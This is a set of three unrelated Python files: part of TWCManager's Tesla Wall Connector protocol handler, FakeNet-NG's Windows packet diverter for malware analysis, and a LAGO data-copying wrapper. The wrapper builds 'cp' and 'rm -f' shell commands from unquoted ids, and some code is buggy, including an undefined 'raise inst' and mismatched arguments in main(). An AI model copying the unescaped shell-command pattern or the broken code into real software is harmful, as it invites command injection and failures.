msgMatch = re.search(b"^\xfd\xb2(..)\x00\x00.+\Z", msg, re.DOTALL)
if msgMatch and foundMsgMatch == False:
# Handle acknowledgement of Stop command
foundMsgMatch = True
senderID = msgMatch.group(1)
msgMatch = re.search(
b"^\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave.
#
# We expect to see one of these before we start sending our
# own heartbeat message to slave.
# Once we start sending our heartbeat to slave once per
# second, it should no longer send these linkready messages.
# If slave doesn't hear master's heartbeat for around 10
# seconds, it sends linkready once per 10 seconds and starts
# flashing its red LED 4 times with the top green light on.
# Red LED stops flashing if we start sending heartbeat
# again.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if maxAmps >= 80:
# U.S. chargers need a spike to 21A to cancel a 6A
# charging limit imposed in an Oct 2017 Tesla car
# firmware update. See notes where
# spikeAmpsToCancel6ALimit is used.
master.setSpikeAmps(21)
else:
# EU chargers need a spike to only 16A. This value
# comes from a forum post and has not been directly
# tested.
master.setSpikeAmps(16)
if senderID == fakeTWCID:
logger.info(
"Slave TWC %02X%02X reports same TWCID as master. "
"Slave should resolve by changing its TWCID."
% (senderID[0], senderID[1])
)
# I tested sending a linkready to a real master with the
# same TWCID as master and instead of master sending back
# its heartbeat message, it sent 5 copies of its
# linkready1 and linkready2 messages. Those messages
# will prompt a real slave to pick a new random value
# for its TWCID.
#
# We mimic that behavior by setting numInitMsgsToSend =
# 10 to make the idle code at the top of the for()
# loop send 5 copies of linkready1 and linkready2.
numInitMsgsToSend = 10
continue
# We should always get this linkready message at least once
# and generally no more than once, so this is a good
# opportunity to add the slave to our known pool of slave
# devices.
slaveTWC = master.newSlave(senderID, maxAmps)
if (
slaveTWC.protocolVersion == 1
and slaveTWC.minAmpsTWCSupports == 6
):
if len(msg) == 14:
slaveTWC.protocolVersion = 1
slaveTWC.minAmpsTWCSupports = 5
elif len(msg) == 16:
slaveTWC.protocolVersion = 2
slaveTWC.minAmpsTWCSupports = 6
logger.info(
"Set slave TWC %02X%02X protocolVersion to %d, minAmpsTWCSupports to %d."
% (
senderID[0],
senderID[1],
slaveTWC.protocolVersion,
slaveTWC.minAmpsTWCSupports,
)
)
# We expect maxAmps to be 80 on U.S. chargers and 32 on EU
# chargers. Either way, don't allow
# slaveTWC.wiringMaxAmps to be greater than maxAmps.
if slaveTWC.wiringMaxAmps > maxAmps:
logger.info(
"\n\n!!! DANGER DANGER !!!\nYou have set wiringMaxAmpsPerTWC to "
+ str(config["config"]["wiringMaxAmpsPerTWC"])
+ " which is greater than the max "
+ str(maxAmps)
+ " amps your charger says it can handle. "
"Please review instructions in the source code and consult an "
"electrician if you don't know what to do."
)
slaveTWC.wiringMaxAmps = maxAmps / 4
# Make sure we print one SHB message after a slave
# linkready message is received by clearing
# lastHeartbeatDebugOutput. This helps with debugging
# cases where I can't tell if we responded with a
# heartbeat or not.
slaveTWC.lastHeartbeatDebugOutput = ""
slaveTWC.timeLastRx = time.time()
slaveTWC.send_master_heartbeat()
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave.
#
# These messages come in as a direct response to each
# heartbeat message from master. Slave does not send its
# heartbeat until it gets one from master first.
# A real master sends heartbeat to a slave around once per
# second, so we do the same near the top of this for()
# loop. Thus, we should receive a heartbeat reply from the
# slave around once per second as well.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
try:
slaveTWC = master.getSlaveByID(senderID)
except KeyError:
# Normally, a slave only sends us a heartbeat message if
# we send them ours first, so it's not expected we would
# hear heartbeat from a slave that's not in our list.
logger.info(
"ERROR: Received heartbeat message from "
"slave %02X%02X that we've not met before."
% (senderID[0], senderID[1])
)
continue
if fakeTWCID == receiverID:
slaveTWC.receive_slave_heartbeat(heartbeatData)
else:
# I've tried different fakeTWCID values to verify a
# slave will send our fakeTWCID back to us as
# receiverID. However, I once saw it send receiverID =
# 0000.
# I'm not sure why it sent 0000 and it only happened
# once so far, so it could have been corruption in the
# data or an unusual case.
logger.info(
"WARNING: Slave TWC %02X%02X status data: "
"%s sent to unknown TWC %02X%02X."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
)
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(....)(..)(..)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle kWh total and voltage message from slave.
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EB <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# According to FuzzyLogic, this message has the following
# format on an EU (3-phase) TWC:
# FD EB <Slave TWCID> 00000038 00E6 00F1 00E8 00
# 00000038 (56) is the total kWh delivered to cars
# by this TWC since its construction.
# 00E6 (230) is voltage on phase A
# 00F1 (241) is voltage on phase B
# 00E8 (232) is voltage on phase C
#
# I'm guessing in world regions with two-phase power that
# this message would be four bytes shorter, but the pattern
# above will match a message of any length that starts with
# FD EB.
foundMsgMatch = True
senderID = msgMatch.group(1)
lifetimekWh = msgMatch.group(2)
kWh = (
(lifetimekWh[0] << 24)
+ (lifetimekWh[1] << 16)
+ (lifetimekWh[2] << 8)
+ lifetimekWh[3]
)
vPhaseA = msgMatch.group(3)
voltsPhaseA = (vPhaseA[0] << 8) + vPhaseA[1]
vPhaseB = msgMatch.group(4)
voltsPhaseB = (vPhaseB[0] << 8) + vPhaseB[1]
vPhaseC = msgMatch.group(5)
voltsPhaseC = (vPhaseC[0] << 8) + vPhaseC[1]
data = msgMatch.group(6)
logger.info(
"Slave TWC %02X%02X: Delivered %d kWh, voltage per phase: (%d, %d, %d).",
senderID[0],
senderID[1],
kWh,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
extra={
"logtype": "slave_status",
"TWCID": senderID,
"kWh": kWh,
"voltsPerPhase": [voltsPhaseA, voltsPhaseB, voltsPhaseC],
},
)
# Update the timestamp of the last reciept of this message
master.lastkWhMessage = time.time()
# Every time we get this message, we re-queue the query
master.queue_background_task({"cmd": "getLifetimekWh"})
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWh, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
else:
msgMatch = re.search(
b"\A\xfd(\xee|\xef|\xf1)(..)(.+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Get 7 characters of VIN from slave. (XE is first 7, XF second 7)
#
# This message can only be generated by TWCs running newer
# firmware. I believe it's only sent as a response to a
# message from Master in this format:
# FB EE <Master TWCID> <Slave TWCID> 00 00 00 00 00 00 00 00 00
# Response message is FD EE <Slave TWCID> VV VV VV VV VV VV VV where VV is an ascii character code
# representing a letter or number. VV will be all zero when car CAN communication is disabled
# (DIP switch 2 down) or when a non-Tesla vehicle is plugged in using something like a JDapter.
foundMsgMatch = True
vinPart = msgMatch.group(1)
senderID = msgMatch.group(2)
data = msgMatch.group(3)
logger.log(
logging.INFO6,
"Slave TWC %02X%02X reported VIN data: %s."
% (senderID[0], senderID[1], hex_str(data)),
)
slaveTWC = master.getSlaveByID(senderID)
if vinPart == b"\xee":
vinPart = 0
if vinPart == b"\xef":
vinPart = 1
if vinPart == b"\xf1":
vinPart = 2
slaveTWC.VINData[vinPart] = data.decode("utf-8").rstrip("\x00")
if vinPart < 2:
vinPart += 1
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": senderID,
"vinPart": str(vinPart),
}
)
else:
potentialVIN = "".join(slaveTWC.VINData)
# Ensure we have a valid VIN
if len(potentialVIN) == 17:
# Record Vehicle VIN
slaveTWC.currentVIN = potentialVIN
# Clear VIN retry timer
slaveTWC.lastVINQuery = 0
slaveTWC.vinQueryAttempt = 0
# Record this vehicle being connected
master.recordVehicleVIN(slaveTWC)
# Send VIN data to Status modules
master.updateVINStatus()
# Establish if this VIN should be able to charge
# If not, send stop command
master.queue_background_task(
{
"cmd": "checkVINEntitlement",
"subTWC": slaveTWC,
}
)
vinPart += 1
else:
# Unfortunately the VIN was not the right length.
# Re-request VIN
master.queue_background_task(
{
"cmd": "getVehicleVIN",
"slaveTWC": slaveTWC.TWCID,
"vinPart": 0,
}
)
logger.log(
logging.INFO6,
"Current VIN string is: %s at part %d."
% (str(slaveTWC.VINData), vinPart),
)
else:
msgMatch = re.search(
b"\A\xfc(\xe1|\xe2)(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
foundMsgMatch = True
logger.info(
"ERROR: TWC is set to Master mode so it can't be controlled by TWCManager. "
"Search installation instruction PDF for 'rotary switch' and set "
"switch so its arrow points to F on the dial."
)
if foundMsgMatch == False:
logger.info(
"*** UNKNOWN MESSAGE FROM SLAVE:"
+ hex_str(msg)
+ "\nPlease private message user CDragon at http://teslamotorsclub.com "
"with a copy of this error."
)
else:
###########################
# Pretend to be a slave TWC
foundMsgMatch = False
msgMatch = re.search(
b"\A\xfc\xe1(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready1 from master.
# See notes in send_master_linkready1() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready1. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
# Other than picking a new fakeTWCID if ours conflicts with
# master, it doesn't seem that a real slave will make any
# sort of direct response when sent a master's linkready1 or
# linkready2.
else:
msgMatch = re.search(
b"\A\xfb\xe2(..)(.)\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready2 from master.
# See notes in send_master_linkready2() for details.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
master.setMasterTWCID(senderID)
# This message seems to always contain seven 00 bytes in its
# data area. If we ever get this message with non-00 data
# we'll print it as an unexpected message.
logger.info(
"Master TWC %02X%02X Linkready2. Sign: %s"
% (senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
master.master_id_conflict()
else:
msgMatch = re.search(
b"\A\xfb\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from Master.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
master.setMasterTWCID(senderID)
try:
slaveTWC = master.slaveTWCs[receiverID]
except KeyError:
slaveTWC = master.newSlave(receiverID, 80)
slaveTWC.masterHeartbeatData = heartbeatData
if receiverID != fakeTWCID:
# This message was intended for another slave.
# Ignore it.
logger.log(
logging.DEBUG2,
"Master %02X%02X sent "
"heartbeat message %s to receiver %02X%02X "
"that isn't our fake slave."
% (
senderID[0],
senderID[1],
hex_str(heartbeatData),
receiverID[0],
receiverID[1],
),
)
continue
amps = (
master.slaveHeartbeatData[1] << 8
) + master.slaveHeartbeatData[2]
master.addkWhDelivered(
(master.convertAmpsToWatts(amps / 100) / 1000 / 60 / 60)
* (now - timeLastkWhDelivered)
)
timeLastkWhDelivered = now
if time.time() - timeLastkWhSaved >= 300.0:
timeLastkWhSaved = now
logger.log(
logging.INFO9,
"Fake slave has delivered %.3fkWh"
% (master.getkWhDelivered()),
)
# Save settings to file
master.queue_background_task({"cmd": "saveSettings"})
if heartbeatData[0] == 0x07:
# Lower amps in use (not amps allowed) by 2 for 10
# seconds. Set state to 07.
master.slaveHeartbeatData[0] = heartbeatData[0]
timeToRaise2A = now + 10
amps -= 280
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif heartbeatData[0] == 0x06:
# Raise amp setpoint by 2 permanently and reply with
# state 06. After 44 seconds, report state 0A.
timeTo0Aafter06 = now + 44
master.slaveHeartbeatData[0] = heartbeatData[0]
amps += 200
master.slaveHeartbeatData[1] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[2] = amps & 0xFF
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
elif (
heartbeatData[0] == 0x05
or heartbeatData[0] == 0x08
or heartbeatData[0] == 0x09
):
if ((heartbeatData[1] << 8) + heartbeatData[2]) > 0:
# A real slave mimics master's status bytes [1]-[2]
# representing max charger power even if the master
# sends it a crazy value.
master.slaveHeartbeatData[1] = heartbeatData[1]
master.slaveHeartbeatData[2] = heartbeatData[2]
ampsUsed = (heartbeatData[1] << 8) + heartbeatData[2]
ampsUsed -= 80
master.slaveHeartbeatData[3] = (ampsUsed >> 8) & 0xFF
master.slaveHeartbeatData[4] = ampsUsed & 0xFF
elif heartbeatData[0] == 0:
if timeTo0Aafter06 > 0 and timeTo0Aafter06 < now:
timeTo0Aafter06 = 0
master.slaveHeartbeatData[0] = 0x0A
elif timeToRaise2A > 0 and timeToRaise2A < now:
# Real slave raises amps used by 2 exactly 10
# seconds after being sent into state 07. It raises
# a bit slowly and sets its state to 0A 13 seconds
# after state 07. We aren't exactly emulating that
# timing here but hopefully close enough.
timeToRaise2A = 0
amps -= 80
master.slaveHeartbeatData[3] = (amps >> 8) & 0xFF
master.slaveHeartbeatData[4] = amps & 0xFF
master.slaveHeartbeatData[0] = 0x0A
elif heartbeatData[0] == 0x02:
logger.info(
"Master heartbeat contains error %ld: %s"
% (heartbeatData[1], hex_str(heartbeatData))
)
else:
logger.info("UNKNOWN MHB state %s" % (hex_str(heartbeatData)))
# Slaves always respond to master's heartbeat by sending
# theirs back.
slaveTWC.send_slave_heartbeat(senderID)
slaveTWC.print_status(master.slaveHeartbeatData)
else:
msgMatch = re.search(
b"\A\xfc\x1d\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+?.\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle 2-hour idle message
#
# This message is sent from a Master TWC three times in a
# row every 2 hours:
# c0 fc 1d 00 00 00 00 00 00 00 00 00 00 00 1d c0
#
# I'd say this is used to indicate the master is still
# alive, but it doesn't contain the Master's TWCID or any other
# data so I don't see what any receiving TWC can do with it.
#
# I suspect this message is only sent when the master
# doesn't see any other TWCs on the network, so I don't
# bother to have our fake master send these messages being
# as there's no point in playing a fake master with no
# slaves around.
foundMsgMatch = True
logger.info("Received 2-hour idle message from Master.")
else:
msgMatch = re.search(
b"\A\xfd\xe2(..)(.)(..)\x00\x00\x00\x00\x00\x00.+\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle linkready message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
sign = msgMatch.group(2)
maxAmps = ((msgMatch.group(3)[0] << 8) + msgMatch.group(3)[1]) / 100
logger.info(
"%.2f amp slave TWC %02X%02X is ready to link. Sign: %s"
% (maxAmps, senderID[0], senderID[1], hex_str(sign))
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
master.newSlave(senderID, maxAmps)
else:
msgMatch = re.search(
b"\A\xfd\xe0(..)(..)(.......+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle heartbeat message from slave on network that
# presumably isn't us.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
heartbeatData = msgMatch.group(3)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received slave heartbeat message from "
"slave %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
try:
slaveTWC = master.slaveTWCs[senderID]
except KeyError:
# Slave is unlikely to send another linkready since it's
# already linked with a real Master TWC, so just assume
# it's 80A.
slaveTWC = master.newSlave(senderID, 80)
slaveTWC.print_status(heartbeatData)
else:
msgMatch = re.search(
b"\A\xfb\xeb(..)(..)(\x00\x00\x00\x00\x00\x00\x00\x00\x00+?).\Z",
msg,
re.DOTALL,
)
if msgMatch and foundMsgMatch == False:
# Handle voltage request message. This is only supported in
# Protocol 2 so we always reply with a 16-byte message.
foundMsgMatch = True
senderID = msgMatch.group(1)
receiverID = msgMatch.group(2)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage request message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.log(
logging.INFO8,
"VRQ from %02X%02X to %02X%02X"
% (senderID[0], senderID[1], receiverID[0], receiverID[1]),
)
if receiverID == fakeTWCID:
kWhCounter = int(master.getkWhDelivered())
kWhPacked = bytearray(
[
((kWhCounter >> 24) & 0xFF),
((kWhCounter >> 16) & 0xFF),
((kWhCounter >> 8) & 0xFF),
(kWhCounter & 0xFF),
]
)
logger.info(
"VRS %02X%02X: %dkWh (%s) %dV %dV %dV"
% (
fakeTWCID[0],
fakeTWCID[1],
kWhCounter,
hex_str(kWhPacked),
240,
0,
0,
)
)
master.getInterfaceModule().send(
bytearray(b"\xFD\xEB")
+ fakeTWCID
+ kWhPacked
+ bytearray(b"\x00\xF0\x00\x00\x00\x00\x00")
)
else:
msgMatch = re.search(
b"\A\xfd\xeb(..)(.........+?).\Z", msg, re.DOTALL
)
if msgMatch and foundMsgMatch == False:
# Handle voltage response message.
# Example US value:
# FD EB 7777 00000014 00F6 0000 0000 00
# EU value (3 phase power):
# FD EB 7777 00000038 00E6 00F1 00E8 00
foundMsgMatch = True
senderID = msgMatch.group(1)
data = msgMatch.group(2)
kWhCounter = (
(data[0] << 24) + (data[1] << 16) + (data[2] << 8) + data[3]
)
voltsPhaseA = (data[4] << 8) + data[5]
voltsPhaseB = (data[6] << 8) + data[7]
voltsPhaseC = (data[8] << 8) + data[9]
# Update this detail for the Slave TWC
master.updateSlaveLifetime(
senderID, kWhCounter, voltsPhaseA, voltsPhaseB, voltsPhaseC
)
if senderID == fakeTWCID:
logger.info(
"ERROR: Received voltage response message from "
"TWC %02X%02X that has the same TWCID as our fake slave."
% (senderID[0], senderID[1])
)
continue
logger.info(
"VRS %02X%02X: %dkWh %dV %dV %dV"
% (
senderID[0],
senderID[1],
kWhCounter,
voltsPhaseA,
voltsPhaseB,
voltsPhaseC,
)
)
if foundMsgMatch == False:
logger.info("***UNKNOWN MESSAGE from master: " + hex_str(msg))
except KeyboardInterrupt:
logger.info("Exiting after background tasks complete...")
break
except Exception as e:
# Print info about unhandled exceptions, then continue. Search for
# 'Traceback' to find these in the log.
traceback.print_exc()
logger.info("Unhandled Exception:" + traceback.format_exc())
# Sleep 5 seconds so the user might see the error.
time.sleep(5)
# Make sure any volatile data is written to disk before exiting
master.queue_background_task({"cmd": "saveSettings"})
# Wait for background tasks thread to finish all tasks.
# Note that there is no such thing as backgroundTasksThread.stop(). Because we
# set the thread type to daemon, it will be automatically killed when we exit
# this program.
master.backgroundTasksQueue.join()
# Close the input module
master.getInterfaceModule().close()
#
# End main program
#
##############################
|
windows.py
|
# Diverter for Windows implemented using WinDivert library
import logging
from pydivert.windivert import *
import socket
import os
import dpkt
from . import fnpacket
import time
import threading
import platform
from winutil import *
from diverterbase import *
import subprocess
class WindowsPacketCtx(fnpacket.PacketCtx):
def __init__(self, lbl, wdpkt):
self.wdpkt = wdpkt
raw = wdpkt.raw.tobytes()
super(WindowsPacketCtx, self).__init__(lbl, raw)
# Packet mangling properties are extended here to also write the data to
# the pydivert.Packet object. This is because there appears to be no way to
# populate the pydivert.Packet object with plain octets unless you can also
# provide @interface and @direction arguments which do not appear at a
# glance to be directly available as attributes of pydivert.Packet,
# according to https://ffalcinelli.github.io/pydivert/
#
# Perhaps we can get these from wd_addr?
# src_ip overrides
@property
def src_ip(self):
return self._src_ip
@src_ip.setter
def src_ip(self, new_srcip):
super(self.__class__, self.__class__).src_ip.fset(self, new_srcip)
self.wdpkt.src_addr = new_srcip
# dst_ip overrides
@property
def dst_ip(self):
return self._dst_ip
@dst_ip.setter
def dst_ip(self, new_dstip):
super(self.__class__, self.__class__).dst_ip.fset(self, new_dstip)
self.wdpkt.dst_addr = new_dstip
# sport overrides
@property
def sport(self):
return self._sport
@sport.setter
def sport(self, new_sport):
super(self.__class__, self.__class__).sport.fset(self, new_sport)
if self.proto:
self.wdpkt.src_port = new_sport
# dport overrides
@property
def dport(self):
return self._dport
@dport.setter
def dport(self, new_dport):
super(self.__class__, self.__class__).dport.fset(self, new_dport)
if self.proto:
self.wdpkt.dst_port = new_dport
class Diverter(DiverterBase, WinUtilMixin):
def __init__(self, diverter_config, listeners_config, ip_addrs,
logging_level=logging.INFO):
# Populated by winutil and used to restore modified Interfaces back to
# DHCP
self.adapters_dhcp_restore = list()
self.adapters_dns_restore = list()
super(Diverter, self).__init__(diverter_config, listeners_config,
ip_addrs, logging_level)
self.running_on_windows = True
if not self.single_host_mode:
self.logger.critical('Windows diverter currently only supports '
'SingleHost mode')
sys.exit(1)
# Used (by winutil) for caching of DNS server names prior to changing
self.adapters_dns_server_backup = dict()
# Configure external and loopback IP addresses
self.external_ip = self.get_best_ipaddress()
if not self.external_ip:
self.external_ip = self.get_ip_with_gateway()
if not self.external_ip:
self.external_ip = socket.gethostbyname(socket.gethostname())
self.logger.debug('External IP: %s Loopback IP: %s' %
(self.external_ip, self.loopback_ip))
#######################################################################
# Initialize filter and WinDivert driver
# Interpose on all IP datagrams so they appear in the pcap, let
# DiverterBase decide whether they're actually forwarded etc.
self.filter = 'outbound and ip'
# Initialize WinDivert
try:
self.handle = WinDivert(filter=self.filter)
self.handle.open()
except WindowsError, e:
if e.winerror == 5:
self.logger.critical('ERROR: Insufficient privileges to run '
'windows diverter.')
self.logger.critical(' Please restart with '
'Administrator privileges.')
sys.exit(1)
elif e.winerror == 3:
self.logger.critical('ERROR: Could not locate WinDivert DLL '
'or one of its components.')
self.logger.critical(' Please make sure you have copied '
'FakeNet-NG to the C: drive.')
sys.exit(1)
else:
self.logger.critical('ERROR: Failed to open a handle to the '
'WinDivert driver: %s', e)
sys.exit(1)
###########################################################################
# Diverter controller functions
def startCallback(self):
# Set local DNS server IP address
if self.is_set('modifylocaldns'):
self.set_dns_server(self.external_ip)
# Stop DNS service
if self.is_set('stopdnsservice'):
self.stop_service_helper('Dnscache')
self.logger.debug('Diverting ports: ')
self.flush_dns()
self.diverter_thread = threading.Thread(target=self.divert_thread)
self.diverter_thread.daemon = True
self.diverter_thread.start()
return True
def divert_thread(self):
try:
while True:
wdpkt = self.handle.recv()
if wdpkt is None:
self.logger.error('ERROR: Can\'t handle packet.')
continue
pkt = WindowsPacketCtx('divert_thread', wdpkt)
cb3 = [
self.check_log_icmp,
self.redirIcmpIpUnconditionally
]
cb4 = [
self.maybe_redir_port,
self.maybe_fixup_sport,
self.maybe_redir_ip,
self.maybe_fixup_srcip,
]
self.handle_pkt(pkt, cb3, cb4)
# Attempt to send the processed packet
self.setLastErrorNull() # WinDivert/LastError workaround
try:
self.handle.send(pkt.wdpkt)
except Exception, e:
protocol = 'Unknown'
if pkt.proto:
protocol = pkt.proto
elif pkt.is_icmp:
protocol = 'ICMP'
self.logger.error('ERROR: Failed to send %s %s %s packet',
self.pktDirectionStr(pkt),
self.pktInterfaceStr(pkt), protocol)
self.logger.error(' %s' % (pkt.hdrToStr()))
self.logger.error(' %s', e)
except WindowsError as e:
if e.winerror in [4, 6, 995]:
return
else:
raise
def stopCallback(self):
if self.pcap:
self.pcap.close()
self.handle.close()
# Restore DHCP adapter settings
for interface_name in self.adapters_dhcp_restore:
cmd_set_dhcp = ('netsh interface ip set address name="%s" dhcp' %
interface_name)
# Restore DHCP on interface
try:
subprocess.check_call(cmd_set_dhcp, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError, e:
self.logger.error('Failed to restore DHCP on interface %s.' %
interface_name)
else:
self.logger.info('Restored DHCP on interface %s' %
interface_name)
# Restore DHCP adapter settings
for interface_name in self.adapters_dns_restore:
cmd_del_dns = ('netsh interface ip delete dns name="%s" all' %
interface_name)
cmd_set_dns_dhcp = ('netsh interface ip set dns "%s" dhcp' %
interface_name)
# Restore DNS on interface
try:
subprocess.check_call(cmd_del_dns, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
subprocess.check_call(cmd_set_dns_dhcp, shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
except subprocess.CalledProcessError, e:
self.logger.error("Failed to restore DNS on interface %s." %
interface_name)
else:
self.logger.info("Restored DNS on interface %s" %
interface_name)
# Restore DNS server
if self.is_set('modifylocaldns'):
self.restore_dns_server()
# Restart DNS service
if self.is_set('stopdnsservice'):
self.start_service_helper('Dnscache')
self.flush_dns()
return True
def pktInterfaceStr(self, pkt):
"""WinDivert provides is_loopback which Windows Diverter uses to
display information about the disposition of packets it is
processing during error and other cases.
"""
return 'loopback' if pkt.wdpkt.is_loopback else 'external'
def pktDirectionStr(self, pkt):
"""WinDivert provides is_inbound which Windows Diverter uses to
display information about the disposition of packets it is
processing during error and other cases.
"""
return 'inbound' if pkt.wdpkt.is_inbound else 'outbound'
def redirIcmpIpUnconditionally(self, crit, pkt):
"""Redirect ICMP to loopback or external IP if necessary.
On Windows, we can't conveniently use an iptables REDIRECT rule to get
ICMP packets sent back home for free, so here is some code.
"""
if (pkt.is_icmp and
pkt.dst_ip not in [self.loopback_ip, self.external_ip]):
self.logger.info('Modifying ICMP packet (type %d, code %d):' %
(pkt.icmp_type, pkt.icmp_code))
self.logger.info(' from: %s' % (pkt.hdrToStr()))
pkt.dst_ip = self.getNewDestinationIp(pkt.src_ip)
self.logger.info(' to: %s' % (pkt.hdrToStr()))
return pkt
def main():
diverter_config = {'redirectalltraffic': 'no',
'defaultlistener': 'DefaultListener',
'dumppackets': 'no'}
listeners_config = {'DefaultListener': {'port': '1337', 'protocol': 'TCP'}}
diverter = Diverter(diverter_config, listeners_config)
diverter.start()
###########################################################################
# Run processing
import time
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
diverter.stop()
###########################################################################
# Run tests
# TODO
if __name__ == '__main__':
main()
|
ARTIwrapper.py
|
#
###############################################################################
# Original Author: A.J. Rubio-Montero (http://orcid.org/0000-0001-6497-753X), #
# CIEMAT - Sci-Track Group (http://rdgroups.ciemat.es/web/sci-track),#
# for the EOSC-Synergy project (EU H2020 RI Grant No 857647). #
# License (SPDX): BSD-3-Clause (https://opensource.org/licenses/BSD-3-Clause) #
# Copyright (c): 2020-today, The LAGO Collaboration (http://lagoproject.net) #
###############################################################################
# additional modules needed
# apt-get install python3-xattr
# or yum install -y python36-pyxattr
import os
import xattr
import json
import shutil
import time
from threading import Thread
from queue import Queue
# own functions
import osUtils
import mdUtils
class ARTIwrapper():
def __init__(self, get_sys_args, get_dataset_metadata, producer):
self._q = Queue()
self._q_onedata = Queue()
# passed functions
self._get_sys_args = get_sys_args
self._get_dataset_metadata = get_dataset_metadata
self._producer = producer
# ---- queued operations through OneClient -----------
def _consumer_onedata_cp(self, onedata_path):
while True:
md = self._q_onedata.get()
try:
id = json.loads(md)['@id']
# oneclient change the filename owner when you move it to
# onedata and this action raise exceptions with shutil.move()
# shutil.move('.' + id, onedata_path + id)
#
# copy if the file exists, if not can be because corsika failed
if os.path.exists("." + id):
cmd = "cp ." + id + " " + onedata_path + id
osUtils.run_Popen(cmd)
time.sleep(0.1)
# test if effectively copied to copy metadata
if os.path.exists(onedata_path + id):
xattr.setxattr(onedata_path + id, 'onedata_json', md)
id_hidden = '/' + id.lstrip('/').replace('/','/.metadata/.')
osUtils._write_file(onedata_path + id_hidden + '.jsonld', md)
else:
print('CAUTION: '+ id +' is not in onedata, requeuing...' )
raise inst
# thus, I can remove local file
cmd = "rm -f ." + id
osUtils.run_Popen(cmd)
else:
print('ERROR: '+ id +' was not calculated')
self._q_onedata.task_done()
except Exception as inst:
print(id + ': copy queued again')
self._q_onedata.put(md)
time.sleep(2)
# we have to substract 1 to queue lenght because q.put
# always add 1 to lenght but really we are re-queing and
# size remains the same
self._q_onedata.task_done()
def _run_check_and_copy_results(self, catcodename, filecode, task, onedata_path,
arti_params_dict):
# check if the results are already in onedata before running the task
runtask = False
mdlist_prev = self._get_dataset_metadata(catcodename, filecode,
mdUtils.xsd_dateTime(), mdUtils.xsd_dateTime(),
arti_params_dict)
for md in mdlist_prev:
id = json.loads(md)['@id']
# We should also check if the existent metadata is well formed
f = onedata_path + id
# print("Check if exist: " + f)
if not os.path.exists(f):
print("This result does not exist in onedata: " + f)
print("Thus... I will RUN : " + filecode)
runtask = True
break
if not runtask:
print("Results already in OneData, none to do with RUN : " + filecode)
else:
try:
start_date = mdUtils.xsd_dateTime()
osUtils.run_Popen(task)
metadatalist = self._get_dataset_metadata(catcodename, filecode,
start_date, mdUtils.xsd_dateTime(),
arti_params_dict)
for md in metadatalist:
self._q_onedata.put(md)
except Exception as inst:
raise inst
# ---- END: queued operations through OneClient -----------
# ---- producer/consumer of executions ---------
# Introduced as param in init()
# function inputs: catcodename, arti_params
# output: Queue() with (filecode, task) elements
